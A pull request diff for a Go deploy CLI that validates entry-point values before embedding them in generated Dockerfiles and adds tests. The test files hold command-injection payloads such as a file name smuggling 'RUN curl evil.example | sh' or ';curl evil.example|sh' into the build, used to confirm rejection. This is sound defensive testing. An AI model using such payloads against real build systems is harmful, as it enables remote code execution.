### PR TITLE
fix: validate deploy CLI values embedded in generated Dockerfile content

### DIFF
--- a/cmd/adkgo/internal/deploy/agentengine/agentengine.go
+++ b/cmd/adkgo/internal/deploy/agentengine/agentengine.go
@@ -151,6 +151,17 @@ func (f *deployAgentEngineFlags) computeFlags() error {
 			f.build.dockerfileBuildPath = path.Join(f.build.tempDir, "Dockerfile")
 			f.build.archivePath = path.Join(f.build.tempDir, "archive.tgz")
 
+			// Both values are embedded in a Dockerfile RUN (shell-form)
+			// instruction, so they need the stricter shell-safe allowlist,
+			// not just the quote/newline blocklist used where a value only
+			// reaches a non-shell-form context (COPY path, CMD exec array).
+			if err := util.ValidateShellArgSafe(f.build.execFile, "entry point"); err != nil {
+				return err
+			}
+			if err := util.ValidateShellArgSafe(f.source.origEntryPointPath, "--entry_point_path"); err != nil {
+				return err
+			}
+
 			dateTimeString := time.Now().Format(time.RFC3339)
 			f.agentEngine.displayName = f.agentEngine.name
 			if f.agentEngine.displayName == "" {

--- a/cmd/adkgo/internal/deploy/agentengine/agentengine.go
+++ b/cmd/adkgo/internal/deploy/agentengine/agentengine.go
@@ -117,27 +117,20 @@ func init() {
 func (f *deployAgentEngineFlags) computeFlags() error {
 	return util.LogStartStop("Computing flags & preparing temp",
 		func(p util.Printer) error {
-			f.source.origEntryPointPath = flags.source.entryPointPath
-			absp, err := filepath.Abs(flags.source.entryPointPath)
+			f.source.origEntryPointPath = f.source.entryPointPath
+			absp, err := filepath.Abs(f.source.entryPointPath)
 			if err != nil {
 				return fmt.Errorf("cannot make an absolute path from '%v': %w", f.source.entryPointPath, err)
 			}
 			f.source.entryPointPath = absp
 
-			if flags.build.tempDir == "" {
-				flags.build.tempDir = os.TempDir()
-			}
-			absp, err = filepath.Abs(flags.build.tempDir)
-			if err != nil {
-				return fmt.Errorf("cannot make an absolute path from '%v': %w", f.build.tempDir, err)
-			}
-			f.build.tempDir, err = os.MkdirTemp(absp, "agentEngine_"+time.Now().Format("20060102_150405__")+"*")
-			if err != nil {
-				return fmt.Errorf("cannot create a temporary sub directory in '%v': %w", absp, err)
-			}
-			p("Using temp dir:", f.build.tempDir)
-
-			// come up with a executable name based on entry point path
+			// come up with a executable name based on entry point path.
+			// Deriving and checking it happens before the temp dir is created:
+			// everything here can fail, and cleanTemp only runs after a fully
+			// successful deploy, so a rejected value would otherwise leave an
+			// empty agentEngine_<timestamp>_* directory behind. Nothing above
+			// needs the directory; every field that resolves against it
+			// (execPath, dockerfileBuildPath, archivePath) is assigned below.
 			dir, file := path.Split(f.source.entryPointPath)
 			f.source.srcBasePath = dir
 			f.source.entryPointPath = file
@@ -147,7 +140,35 @@ func (f *deployAgentEngineFlags) computeFlags() error {
 					return fmt.Errorf("cannot strip '.go' extension from entry point path '%v': %w", f.source.entryPointPath, err)
 				}
 				f.build.execFile = exec
-				f.build.execPath = path.Join(f.build.tempDir, exec)
+			}
+
+			// Both values are embedded in a Dockerfile RUN (shell-form)
+			// instruction, so they need the stricter shell-safe allowlist,
+			// not just the quote/newline blocklist used where a value only
+			// reaches a non-shell-form context (COPY path, CMD exec array).
+			if err := util.ValidateShellArgSafe(f.build.execFile,
+				fmt.Sprintf("executable name derived from --entry_point_path %q:", f.source.origEntryPointPath)); err != nil {
+				return err
+			}
+			if err := util.ValidateShellArgSafe(f.source.origEntryPointPath, "--entry_point_path"); err != nil {
+				return err
+			}
+
+			if f.build.tempDir == "" {
+				f.build.tempDir = os.TempDir()
+			}
+			absp, err = filepath.Abs(f.build.tempDir)
+			if err != nil {
+				return fmt.Errorf("cannot make an absolute path from '%v': %w", f.build.tempDir, err)
+			}
+			f.build.tempDir, err = os.MkdirTemp(absp, "agentEngine_"+time.Now().Format("20060102_150405__")+"*")
+			if err != nil {
+				return fmt.Errorf("cannot create a temporary sub directory in '%v': %w", absp, err)
+			}
+			p("Using temp dir:", f.build.tempDir)
+
+			if f.build.execPath == "" {
+				f.build.execPath = path.Join(f.build.tempDir, f.build.execFile)
 			}
 			f.build.dockerfileBuildPath = path.Join(f.build.tempDir, "Dockerfile")
 			f.build.archivePath = path.Join(f.build.tempDir, "archive.tgz")
@@ -245,6 +266,10 @@ func (f *deployAgentEngineFlags) prepareDockerfile() error {
 		func(p util.Printer) error {
 			p("Writing:", f.build.dockerfileBuildPath)
 
+			// Every value below is read off the receiver, not off the package
+			// global. computeFlags validates the receiver, so a read of the
+			// global here would let the guard and the line it guards come apart
+			// for any caller that is not the cobra RunE.
 			var b strings.Builder
 			b.WriteString("\nFROM golang:" + builderGoVersion(f.source.sourceDir) + " AS builder\n")
 			// GOTOOLCHAIN=auto lets the in-image go command fetch the toolchain
@@ -260,9 +285,9 @@ RUN CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags "-s -w" -o ` + f.bui
 FROM gcr.io/distroless/static-debian11
 
 COPY --from=builder /app/` + f.build.execFile + `  /app/` + f.build.execFile + `
-EXPOSE ` + strconv.Itoa(flags.agentEngine.serverPort) + `
+EXPOSE ` + strconv.Itoa(f.agentEngine.serverPort) + `
 # Command to run the executable when the container starts
-CMD ["/app/` + f.build.execFile + `", "web", "-port", "` + strconv.Itoa(flags.agentEngine.serverPort) + `"`)
+CMD ["/app/` + f.build.execFile + `", "web", "-port", "` + strconv.Itoa(f.agentEngine.serverPort) + `"`)
 
 			b.WriteString(`, "agentengine"`)
 

--- a/cmd/adkgo/internal/deploy/agentengine/agentengine_test.go
+++ b/cmd/adkgo/internal/deploy/agentengine/agentengine_test.go
@@ -1,0 +1,76 @@
+// Copyright 2026 Google LLC
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package agentengine
+
+import (
+	"strings"
+	"testing"
+)
+
+// resetFlags restores the package-level flags var to a fresh, minimally
+// valid state before each test, since computeFlags reads/writes it directly.
+func resetFlags(t *testing.T, entryPointPath string) {
+	t.Helper()
+	tempDir := t.TempDir()
+	flags = deployAgentEngineFlags{}
+	flags.source.entryPointPath = entryPointPath
+	flags.build.tempDir = tempDir
+}
+
+func TestComputeFlags_RejectsUnsafeEntryPointBasename(t *testing.T) {
+	// The basename (with .go stripped) becomes f.build.execFile, embedded
+	// directly into the generated Dockerfile's RUN/COPY/CMD lines.
+	maliciousEntryPoint := "main\"\nRUN curl evil.example | sh\n#.go"
+	resetFlags(t, maliciousEntryPoint)
+
+	err := flags.computeFlags()
+	if err == nil {
+		t.Fatal("computeFlags() = nil, want an error rejecting the unsafe entry point basename")
+	}
+	if !strings.Contains(err.Error(), "entry point") {
+		t.Errorf("computeFlags() error = %v, want it to mention the entry point", err)
+	}
+}
+
+func TestComputeFlags_RejectsUnsafeOrigEntryPointPath(t *testing.T) {
+	// origEntryPointPath is the raw --entry_point_path value, captured before
+	// any path processing. execFile, by contrast, is derived only from the
+	// basename of that path, so a malicious directory component doesn't
+	// affect it. This payload keeps the basename clean ("main.go", so the
+	// ".go"-extension strip and the execFile check both succeed) while the
+	// directory component still carries shell metacharacters straight into
+	// the Dockerfile's `RUN ... -o execFile origEntryPointPath` line.
+	maliciousEntryPoint := "a;curl evil.example|sh#/main.go"
+	resetFlags(t, maliciousEntryPoint)
+
+	err := flags.computeFlags()
+	if err == nil {
+		t.Fatal("computeFlags() = nil, want an error rejecting the unsafe --entry_point_path value")
+	}
+	if !strings.Contains(err.Error(), "entry_point_path") {
+		t.Errorf("computeFlags() error = %v, want it to mention --entry_point_path", err)
+	}
+}
+
+func TestComputeFlags_AcceptsBenignValues(t *testing.T) {
+	resetFlags(t, "main.go")
+
+	if err := flags.computeFlags(); err != nil {
+		t.Fatalf("computeFlags() = %v, want no error for benign values", err)
+	}
+	if flags.build.execFile != "main" {
+		t.Errorf("execFile = %q, want %q", flags.build.execFile, "main")
+	}
+}

--- a/cmd/adkgo/internal/deploy/agentengine/agentengine_test.go
+++ b/cmd/adkgo/internal/deploy/agentengine/agentengine_test.go
@@ -15,6 +15,7 @@
 package agentengine
 
 import (
+	"fmt"
 	"os"
 	"path/filepath"
 	"strings"
@@ -55,6 +56,12 @@ func TestGoVersionFromModFile(t *testing.T) {
 // TestPrepareDockerfile_UsesGoModVersion guards that the generated builder image
 // tracks the application's go.mod Go version instead of a hardcoded tag, so a
 // managed Agent Engine build uses a toolchain that can actually compile the app.
+//
+// It is also the only test in this package that drives prepareDockerfile from a
+// receiver that is not the package global, which is what makes the EXPOSE and
+// RUN assertions below load-bearing: everywhere else the receiver and the global
+// are the same struct, so a value read off the global still emits the right
+// bytes.
 func TestPrepareDockerfile_UsesGoModVersion(t *testing.T) {
 	dir := t.TempDir()
 	if err := os.WriteFile(filepath.Join(dir, "go.mod"),
@@ -63,11 +70,25 @@ func TestPrepareDockerfile_UsesGoModVersion(t *testing.T) {
 	}
 	dockerfile := filepath.Join(dir, "Dockerfile")
 
+	// The global holds a different value for every field asserted below, so a
+	// read of flags rather than the receiver emits someone else's bytes rather
+	// than empty ones. The assertions fail either way, but this way they fail
+	// for the reason they name, and without depending on no other test in the
+	// file having left a value behind.
+	resetFlags(t, "other.go")
+	flags.source.origEntryPointPath = "./other.go"
+	flags.build.execFile = "other"
+	flags.agentEngine.serverPort = 8080
+
 	f := &deployAgentEngineFlags{}
 	f.source.sourceDir = dir
 	f.source.origEntryPointPath = "./main.go"
 	f.build.execFile = "agent"
 	f.build.dockerfileBuildPath = dockerfile
+	// Deliberately not the 8080 default, and deliberately never written to the
+	// package global: a prepareDockerfile that read serverPort off the global
+	// would emit "EXPOSE 0" here.
+	f.agentEngine.serverPort = 9091
 
 	if err := f.prepareDockerfile(); err != nil {
 		t.Fatalf("prepareDockerfile() error = %v", err)
@@ -85,6 +106,23 @@ func TestPrepareDockerfile_UsesGoModVersion(t *testing.T) {
 	if !strings.Contains(string(content), "ENV GOTOOLCHAIN=auto") {
 		t.Errorf("Dockerfile is missing the GOTOOLCHAIN=auto safety net:\n%s", content)
 	}
+	if !strings.Contains(string(content), "\nEXPOSE 9091\n") {
+		t.Errorf("Dockerfile does not EXPOSE the receiver's server port:\n%s", content)
+	}
+	// execFile and origEntryPointPath are the two values the strict allow-list
+	// exists for in this package: they are the operands of the shell-form RUN
+	// line. TestPrepareDockerfile_EntryPointReachesRUNLine reads that line too,
+	// but it drives the global, so it cannot tell a receiver read from a global
+	// one. This can.
+	if !strings.Contains(string(content), "-o agent ./main.go\n") {
+		t.Errorf("RUN line does not build the receiver's execFile from its entry point:\n%s", content)
+	}
+	if !strings.Contains(string(content), "\nCOPY --from=builder /app/agent  /app/agent\n") {
+		t.Errorf("Dockerfile does not COPY the receiver's execFile out of the builder:\n%s", content)
+	}
+	if !strings.Contains(string(content), `["/app/agent", "web"`) {
+		t.Errorf("Dockerfile CMD does not run the receiver's execFile:\n%s", content)
+	}
 }
 
 // TestDefaultBuilderGoVersionIsNotPinned guards that the last-resort tag stays a
@@ -94,5 +132,221 @@ func TestDefaultBuilderGoVersionIsNotPinned(t *testing.T) {
 	if isGoVersion(defaultBuilderGoVersion) {
 		t.Errorf("defaultBuilderGoVersion = %q pins a version; use a rolling tag such as %q",
 			defaultBuilderGoVersion, "latest")
+	}
+}
+
+// resetFlags points the package-level flags var at a fresh, minimally valid
+// state for the duration of one test, restoring the previous value afterwards.
+// computeFlags reads and writes that global directly, so without the restore
+// one test's leftovers (an absolutised entryPointPath, a consumed tempDir)
+// would be the next test's starting state.
+//
+// The state installed here is the zero value plus the two fields computeFlags
+// needs, so a test that depends on a flag default (serverPort, which cobra
+// registers as 8080) sets it itself rather than inheriting it.
+func resetFlags(t *testing.T, entryPointPath string) {
+	t.Helper()
+	saved := flags
+	t.Cleanup(func() { flags = saved })
+
+	flags = deployAgentEngineFlags{}
+	flags.source.entryPointPath = entryPointPath
+	flags.build.tempDir = t.TempDir()
+}
+
+// allowListRejection is the part of the ValidateShellArgSafe rejection message
+// that no other validator produces. The tests below match on it rather than on
+// the label, because "entry point" is also a substring of the pre-existing
+// StripExtension wrapper ("cannot strip '.go' extension from entry point path
+// '%v'"): a payload edited to drop the .go extension would then satisfy a
+// label-only assertion while saying nothing about the allow-list. It names the
+// two reasons rather than the rejection itself, because the shorter sentence
+// ("not allowed in a value embedded in generated Dockerfile content") is in
+// ValidateDockerfileSafe's message too, and matching that would let a value
+// that reaches the RUN line be downgraded to the weaker check unnoticed.
+const allowListRejection = "whitespace splits COPY operands and shell metacharacters are live in a RUN line"
+
+func TestComputeFlags_RejectsUnsafeEntryPointBasename(t *testing.T) {
+	// The basename (with .go stripped) becomes f.build.execFile, embedded
+	// directly into the generated Dockerfile's RUN/COPY/CMD lines. The benign
+	// directory component is what makes the assertions below able to tell the
+	// derived executable name apart from the raw flag value: without it the
+	// two strings are byte-identical.
+	maliciousEntryPoint := "cmd/quickstart/main\"\nRUN curl evil.example | sh\n#.go"
+	resetFlags(t, maliciousEntryPoint)
+
+	err := flags.computeFlags()
+	if err == nil {
+		t.Fatal("computeFlags() = nil, want an error rejecting the unsafe entry point basename")
+	}
+	if !strings.Contains(err.Error(), allowListRejection) {
+		t.Errorf("computeFlags() error = %v, want the allow-list rejection %q", err, allowListRejection)
+	}
+	// The checked value is derived, so the message has to carry the flag and the
+	// value as typed for the user to be able to find it in their command line.
+	if want := fmt.Sprintf("derived from --entry_point_path %q", maliciousEntryPoint); !strings.Contains(err.Error(), want) {
+		t.Errorf("computeFlags() error = %v, want it to contain %s", err, want)
+	}
+}
+
+// TestComputeFlags_RejectsUnsafeOrigEntryPointPath covers the raw
+// --entry_point_path value, captured before any path processing. execFile, by
+// contrast, is derived only from the basename of that path, so a malicious
+// directory component does not affect it. Both payloads keep the basename clean
+// ("main.go", so the ".go"-extension strip and the execFile check both succeed)
+// while the directory component carries shell metacharacters straight into the
+// Dockerfile's `RUN ... -o execFile origEntryPointPath` line.
+func TestComputeFlags_RejectsUnsafeOrigEntryPointPath(t *testing.T) {
+	for name, maliciousEntryPoint := range map[string]string{
+		"metacharacters in a directory component": "a;curl evil.example|sh#/main.go",
+		// The second payload is the reason the check has to read the value as
+		// typed rather than any processed form of it. filepath.Abs cleans the
+		// ".." away, so f.source.srcBasePath no longer contains the "a;b"
+		// component, while the RUN line is still emitted from the raw value and
+		// still gets the ';'. A check moved onto srcBasePath accepts this.
+		"metacharacters cleaned out of the processed path": "./a;b/../main.go",
+	} {
+		t.Run(name, func(t *testing.T) {
+			resetFlags(t, maliciousEntryPoint)
+
+			err := flags.computeFlags()
+			if err == nil {
+				t.Fatal("computeFlags() = nil, want an error rejecting the unsafe --entry_point_path value")
+			}
+			if !strings.Contains(err.Error(), allowListRejection) {
+				t.Errorf("computeFlags() error = %v, want the allow-list rejection %q", err, allowListRejection)
+			}
+			// On the value as typed: pinning the label alone would leave the
+			// check free to move onto a processed form of the path under an
+			// unchanged message.
+			if want := fmt.Sprintf("--entry_point_path %q", maliciousEntryPoint); !strings.Contains(err.Error(), want) {
+				t.Errorf("computeFlags() error = %v, want the raw-value check to fire and report %s", err, want)
+			}
+			// And that it is the raw-flag check rather than the
+			// derived-executable-name one above it. That one's label embeds the
+			// raw flag value too ("executable name derived from
+			// --entry_point_path %q:"), so the assertion above matches either
+			// message and cannot tell the two checks apart on its own.
+			if strings.Contains(err.Error(), "derived from") {
+				t.Errorf("computeFlags() error = %v, want the raw --entry_point_path check to fire, not the derived executable name one", err)
+			}
+		})
+	}
+}
+
+func TestComputeFlags_AcceptsBenignValues(t *testing.T) {
+	resetFlags(t, "main.go")
+
+	if err := flags.computeFlags(); err != nil {
+		t.Fatalf("computeFlags() = %v, want no error for benign values", err)
+	}
+	if flags.build.execFile != "main" {
+		t.Errorf("execFile = %q, want %q", flags.build.execFile, "main")
+	}
+	// Deriving execFile above os.MkdirTemp is what keeps a rejected invocation
+	// from leaving a temp dir behind, and it leaves the paths that resolve
+	// against the created directory as the only thing below it. Nothing in this
+	// package reads execPath, since the build runs in the builder stage rather
+	// than on the host, so the two that have to land inside the temp dir are
+	// the ones createArchive writes and tars.
+	for name, p := range map[string]string{
+		"dockerfileBuildPath": flags.build.dockerfileBuildPath,
+		"archivePath":         flags.build.archivePath,
+	} {
+		if !strings.HasPrefix(p, flags.build.tempDir+"/") {
+			t.Errorf("%s = %q, want it inside the created temp dir %q", name, p, flags.build.tempDir)
+		}
+	}
+}
+
+// TestComputeFlags_AcceptsNonASCIIEntryPoint guards the deliberate decision to
+// let the shell-arg allowlist admit non-ASCII runes. Every byte of a multi-byte
+// UTF-8 rune is >= 0x80 and every shell metacharacter is ASCII, so admitting
+// them costs nothing in safety, while rejecting them would fail deploys whose
+// --entry_point_path merely passes through a non-ASCII directory name.
+func TestComputeFlags_AcceptsNonASCIIEntryPoint(t *testing.T) {
+	resetFlags(t, "agentes/café/agenté.go")
+
+	if err := flags.computeFlags(); err != nil {
+		t.Fatalf("computeFlags() = %v, want no error for a non-ASCII entry point path", err)
+	}
+	if flags.build.execFile != "agenté" {
+		t.Errorf("execFile = %q, want %q", flags.build.execFile, "agenté")
+	}
+}
+
+// TestComputeFlags_RejectionLeavesNoTempDir pins the ordering of every check
+// that can fail against os.MkdirTemp. cleanTemp only runs after a fully
+// successful deploy, there is no defer, so a check that fires after the temp
+// dir is created leaves an empty agentEngine_<timestamp>_* directory behind on
+// every rejected invocation. Nothing above os.MkdirTemp needs the directory;
+// the fields that do (execPath, dockerfileBuildPath, archivePath) are all
+// assigned below it.
+//
+// The third case is the one main leaks on today: StripExtension moved above
+// os.MkdirTemp with the two validators, and an entry point path with no ".go"
+// suffix is the only way to reach it.
+func TestComputeFlags_RejectionLeavesNoTempDir(t *testing.T) {
+	for name, entryPoint := range map[string]string{
+		"unsafe basename":  "main\"\nRUN curl evil.example | sh\n#.go",
+		"unsafe directory": "a;curl evil.example|sh#/main.go",
+		"no .go extension": "main",
+	} {
+		t.Run(name, func(t *testing.T) {
+			resetFlags(t, entryPoint)
+			parent := flags.build.tempDir
+
+			if err := flags.computeFlags(); err == nil {
+				t.Fatal("computeFlags() = nil, want an error")
+			}
+			entries, err := os.ReadDir(parent)
+			if err != nil {
+				t.Fatalf("cannot read the temp dir parent: %v", err)
+			}
+			for _, e := range entries {
+				t.Errorf("rejected invocation left %q behind in the temp dir parent", e.Name())
+			}
+		})
+	}
+}
+
+// TestPrepareDockerfile_EntryPointReachesRUNLine pins the reason
+// origEntryPointPath exists at all, and the reason it takes the stronger
+// validator: it is the raw --entry_point_path value, not the absolutised one,
+// that lands in the builder stage's RUN line. That stage's build context is
+// rooted at /app by `COPY . .`, so a host-absolute path there fails every
+// deploy. Without this the emitted line is only connected to the field by
+// reading the code: moving the capture below the filepath.Abs assignment
+// leaves the rest of the suite green. cloudrun ships the symmetric test for
+// its CMD array.
+func TestPrepareDockerfile_EntryPointReachesRUNLine(t *testing.T) {
+	const entryPoint = "cmd/quickstart/main.go"
+	resetFlags(t, entryPoint)
+	flags.agentEngine.serverPort = 8080
+
+	if err := flags.computeFlags(); err != nil {
+		t.Fatalf("computeFlags() = %v, want no error", err)
+	}
+	if err := flags.prepareDockerfile(); err != nil {
+		t.Fatalf("prepareDockerfile() = %v, want no error", err)
+	}
+
+	content, err := os.ReadFile(flags.build.dockerfileBuildPath)
+	if err != nil {
+		t.Fatalf("cannot read the generated Dockerfile: %v", err)
+	}
+	var runLine string
+	for _, line := range strings.Split(string(content), "\n") {
+		if rest, ok := strings.CutPrefix(line, "RUN "); ok {
+			runLine = rest
+		}
+	}
+	if runLine == "" {
+		t.Fatalf("no RUN instruction in the generated Dockerfile:\n%s", content)
+	}
+
+	want := "-o " + flags.build.execFile + " " + entryPoint
+	if !strings.HasSuffix(runLine, want) {
+		t.Errorf("RUN line = %q, want it to end with %q", runLine, want)
 	}
 }

--- a/cmd/adkgo/internal/deploy/cloudrun/cloudrun.go
+++ b/cmd/adkgo/internal/deploy/cloudrun/cloudrun.go
@@ -159,6 +159,17 @@ func (f *deployCloudRunFlags) computeFlags() error {
 			}
 			f.build.dockerfileBuildPath = path.Join(f.build.tempDir, "Dockerfile")
 
+			// execFile is always meant to be a bare filename, so it gets the
+			// stricter shell-safe allowlist for defense-in-depth consistency
+			// with the same field in the agentengine deploy path, where it is
+			// embedded into a Dockerfile RUN (shell-form) instruction.
+			if err := util.ValidateShellArgSafe(f.build.execFile, "entry point"); err != nil {
+				return err
+			}
+			if err := util.ValidateDockerfileSafe(flags.cloudRun.a2aAgentCardURL, "--a2a_agent_url"); err != nil {
+				return err
+			}
+
 			return nil
 		})
 }

--- a/cmd/adkgo/internal/deploy/cloudrun/cloudrun.go
+++ b/cmd/adkgo/internal/deploy/cloudrun/cloudrun.go
@@ -132,26 +132,32 @@ func (f *deployCloudRunFlags) computeFlags() error {
 				return fmt.Errorf("cannot enable Debug API without having enabled API")
 			}
 
-			absp, err := filepath.Abs(flags.source.entryPointPath)
+			// Checked before the temp dir is created so a rejected value does
+			// not leave one behind. It is checked whether or not --a2a is set:
+			// the flag can be flipped later, and a value that can never be
+			// emitted safely is worth reporting either way.
+			if err := util.ValidateDockerfileSafe(f.cloudRun.a2aAgentCardURL, "--a2a_agent_url"); err != nil {
+				return err
+			}
+
+			// The raw flag value, kept for the rejection message below: what
+			// the check sees is a basename derived from this, which a user who
+			// typed a whole path cannot find in their own command line.
+			origEntryPointPath := f.source.entryPointPath
+
+			absp, err := filepath.Abs(f.source.entryPointPath)
 			if err != nil {
 				return fmt.Errorf("cannot make an absolute path from '%v': %w", f.source.entryPointPath, err)
 			}
 			f.source.entryPointPath = absp
 
-			if flags.build.tempDir == "" {
-				flags.build.tempDir = os.TempDir()
-			}
-			absp, err = filepath.Abs(flags.build.tempDir)
-			if err != nil {
-				return fmt.Errorf("cannot make an absolute path from '%v': %w", f.build.tempDir, err)
-			}
-			f.build.tempDir, err = os.MkdirTemp(absp, "cloudrun_"+time.Now().Format("20060102_150405__")+"*")
-			if err != nil {
-				return fmt.Errorf("cannot create a temporary sub directory in '%v': %w", absp, err)
-			}
-			p("Using temp dir:", f.build.tempDir)
-
-			// come up with a executable name based on entry point path
+			// Deriving and checking the executable name happens before the temp
+			// dir is created, for the same reason as the --a2a_agent_url check
+			// above: everything here can fail, and cleanTemp only runs after a
+			// fully successful deploy, so a rejected invocation would otherwise
+			// leave an empty cloudrun_<timestamp>_* directory behind. Nothing
+			// above needs the directory; the fields that resolve against it
+			// (execPath, dockerfileBuildPath) are assigned below.
 			dir, file := path.Split(f.source.entryPointPath)
 			f.source.srcBasePath = dir
 			f.source.entryPointPath = file
@@ -161,7 +167,31 @@ func (f *deployCloudRunFlags) computeFlags() error {
 					return fmt.Errorf("cannot strip '.go' extension from entry point path '%v': %w", f.source.entryPointPath, err)
 				}
 				f.build.execFile = exec
-				f.build.execPath = path.Join(f.build.tempDir, exec)
+			}
+
+			// execFile becomes both COPY operands, and COPY splits its operands
+			// on whitespace, so a bare filename is not enough: it takes the
+			// allowlist even though this Dockerfile has no RUN instruction.
+			if err := util.ValidateShellArgSafe(f.build.execFile,
+				fmt.Sprintf("executable name derived from --entry_point_path %q:", origEntryPointPath)); err != nil {
+				return err
+			}
+
+			if f.build.tempDir == "" {
+				f.build.tempDir = os.TempDir()
+			}
+			absp, err = filepath.Abs(f.build.tempDir)
+			if err != nil {
+				return fmt.Errorf("cannot make an absolute path from '%v': %w", f.build.tempDir, err)
+			}
+			f.build.tempDir, err = os.MkdirTemp(absp, "cloudrun_"+time.Now().Format("20060102_150405__")+"*")
+			if err != nil {
+				return fmt.Errorf("cannot create a temporary sub directory in '%v': %w", absp, err)
+			}
+			p("Using temp dir:", f.build.tempDir)
+
+			if f.build.execPath == "" {
+				f.build.execPath = path.Join(f.build.tempDir, f.build.execFile)
 			}
 			f.build.dockerfileBuildPath = path.Join(f.build.tempDir, "Dockerfile")
 
@@ -205,41 +235,45 @@ func (f *deployCloudRunFlags) prepareDockerfile() error {
 		func(p util.Printer) error {
 			p("Writing:", f.build.dockerfileBuildPath)
 
+			// Every value below is read off the receiver, not off the package
+			// global. computeFlags validates the receiver, so a read of the
+			// global here would let the guard and the line it guards come apart
+			// for any caller that is not the cobra RunE.
 			var b strings.Builder
 			b.WriteString(`
 FROM gcr.io/distroless/static-debian11
 
 COPY ` + f.build.execFile + `  /app/` + f.build.execFile + `
-EXPOSE ` + strconv.Itoa(flags.cloudRun.serverPort) + `
+EXPOSE ` + strconv.Itoa(f.cloudRun.serverPort) + `
 # Command to run the executable when the container starts
-CMD ["/app/` + f.build.execFile + `", "web", "-port", "` + strconv.Itoa(flags.cloudRun.serverPort) + `"`)
+CMD ["/app/` + f.build.execFile + `", "web", "-port", "` + strconv.Itoa(f.cloudRun.serverPort) + `"`)
 
-			if flags.cloudRun.api {
+			if f.cloudRun.api {
 				b.WriteString(`, "api", "-webui_address", "127.0.0.1:` + strconv.Itoa(f.proxy.port) + `"`)
 
-				if flags.cloudRun.debugAPI {
+				if f.cloudRun.debugAPI {
 					b.WriteString(`, "-include_debug_api"`)
 				}
 			}
-			if flags.cloudRun.a2a {
-				b.WriteString(`, "a2a", "--a2a_agent_url", "` + flags.cloudRun.a2aAgentCardURL + `"`)
+			if f.cloudRun.a2a {
+				b.WriteString(`, "a2a", "--a2a_agent_url", "` + f.cloudRun.a2aAgentCardURL + `"`)
 			}
-			if flags.cloudRun.webui {
+			if f.cloudRun.webui {
 				b.WriteString(`, "webui", "--api_server_address", "http://127.0.0.1:` + strconv.Itoa(f.proxy.port) + `/api"`)
 			}
-			if flags.cloudRun.pubsub {
+			if f.cloudRun.pubsub {
 				b.WriteString(`, "pubsub"`)
-				fmt.Fprintf(&b, `, "--trigger_max_retries", "%d"`, flags.cloudRun.pubsubTrigger.maxRetries)
-				fmt.Fprintf(&b, `, "--trigger_base_delay", "%s"`, flags.cloudRun.pubsubTrigger.baseDelay.String())
-				fmt.Fprintf(&b, `, "--trigger_max_delay", "%s"`, flags.cloudRun.pubsubTrigger.maxDelay.String())
-				fmt.Fprintf(&b, `, "--trigger_max_concurrent_runs", "%d"`, flags.cloudRun.pubsubTrigger.maxRuns)
+				fmt.Fprintf(&b, `, "--trigger_max_retries", "%d"`, f.cloudRun.pubsubTrigger.maxRetries)
+				fmt.Fprintf(&b, `, "--trigger_base_delay", "%s"`, f.cloudRun.pubsubTrigger.baseDelay.String())
+				fmt.Fprintf(&b, `, "--trigger_max_delay", "%s"`, f.cloudRun.pubsubTrigger.maxDelay.String())
+				fmt.Fprintf(&b, `, "--trigger_max_concurrent_runs", "%d"`, f.cloudRun.pubsubTrigger.maxRuns)
 			}
-			if flags.cloudRun.eventarc {
+			if f.cloudRun.eventarc {
 				b.WriteString(`, "eventarc"`)
-				fmt.Fprintf(&b, `, "--trigger_max_retries", "%d"`, flags.cloudRun.eventarcTrigger.maxRetries)
-				fmt.Fprintf(&b, `, "--trigger_base_delay", "%s"`, flags.cloudRun.eventarcTrigger.baseDelay.String())
-				fmt.Fprintf(&b, `, "--trigger_max_delay", "%s"`, flags.cloudRun.eventarcTrigger.maxDelay.String())
-				fmt.Fprintf(&b, `, "--trigger_max_concurrent_runs", "%d"`, flags.cloudRun.eventarcTrigger.maxRuns)
+				fmt.Fprintf(&b, `, "--trigger_max_retries", "%d"`, f.cloudRun.eventarcTrigger.maxRetries)
+				fmt.Fprintf(&b, `, "--trigger_base_delay", "%s"`, f.cloudRun.eventarcTrigger.baseDelay.String())
+				fmt.Fprintf(&b, `, "--trigger_max_delay", "%s"`, f.cloudRun.eventarcTrigger.maxDelay.String())
+				fmt.Fprintf(&b, `, "--trigger_max_concurrent_runs", "%d"`, f.cloudRun.eventarcTrigger.maxRuns)
 			}
 			b.WriteString(`]`)
 			return os.WriteFile(f.build.dockerfileBuildPath, []byte(b.String()), 0o600)

--- a/cmd/adkgo/internal/deploy/cloudrun/cloudrun_test.go
+++ b/cmd/adkgo/internal/deploy/cloudrun/cloudrun_test.go
@@ -1,0 +1,70 @@
+// Copyright 2026 Google LLC
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package cloudrun
+
+import (
+	"strings"
+	"testing"
+)
+
+// resetFlags restores the package-level flags var to a fresh, minimally
+// valid state before each test, since computeFlags reads/writes it directly.
+func resetFlags(t *testing.T, entryPointPath, a2aAgentCardURL string) {
+	t.Helper()
+	tempDir := t.TempDir()
+	flags = deployCloudRunFlags{}
+	flags.source.entryPointPath = entryPointPath
+	flags.build.tempDir = tempDir
+	flags.cloudRun.a2aAgentCardURL = a2aAgentCardURL
+}
+
+func TestComputeFlags_RejectsUnsafeEntryPointBasename(t *testing.T) {
+	// The basename (with .go stripped) becomes f.build.execFile, which is
+	// embedded directly into the generated Dockerfile's COPY/CMD lines.
+	maliciousEntryPoint := "main\"\nRUN curl evil.example | sh\n#.go"
+	resetFlags(t, maliciousEntryPoint, "http://127.0.0.1:8081")
+
+	err := flags.computeFlags()
+	if err == nil {
+		t.Fatal("computeFlags() = nil, want an error rejecting the unsafe entry point basename")
+	}
+	if !strings.Contains(err.Error(), "entry point") {
+		t.Errorf("computeFlags() error = %v, want it to mention the entry point", err)
+	}
+}
+
